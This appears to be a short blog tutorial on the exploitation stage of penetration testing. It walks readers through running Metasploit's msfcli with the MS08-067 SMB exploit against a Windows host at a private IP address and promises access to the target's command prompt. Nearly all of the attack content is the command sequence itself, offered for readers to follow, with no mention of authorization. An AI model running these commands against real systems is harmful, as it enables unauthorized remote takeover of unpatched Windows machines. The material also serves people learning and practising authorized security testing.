TARGET EXPLOITATION

After we discover the target’s information, description, open ports, and vulnerabilitites, now we can start to exploit the target. This step is practically finalizes the penetration testing. Because it is a test to a target to discover wether the target can be exploited or not.

 

In this demonstration I use “metasploit”

 

Try to follow this step with me:

 

First of all you have to download the backtrack 5 from the internet. You can have it at http://www.backtrack-linux.org/downloads/

 

Run the following commands:

# cd /pentest/exploits/framework/

# ./msfcli -h

# ./msfcli windows/smb/ms08_067_netapi O

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7

ImageImage

Image

Image

 

And now you already connected with your target’s command prompt 🙂 enjoy the exploitation

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s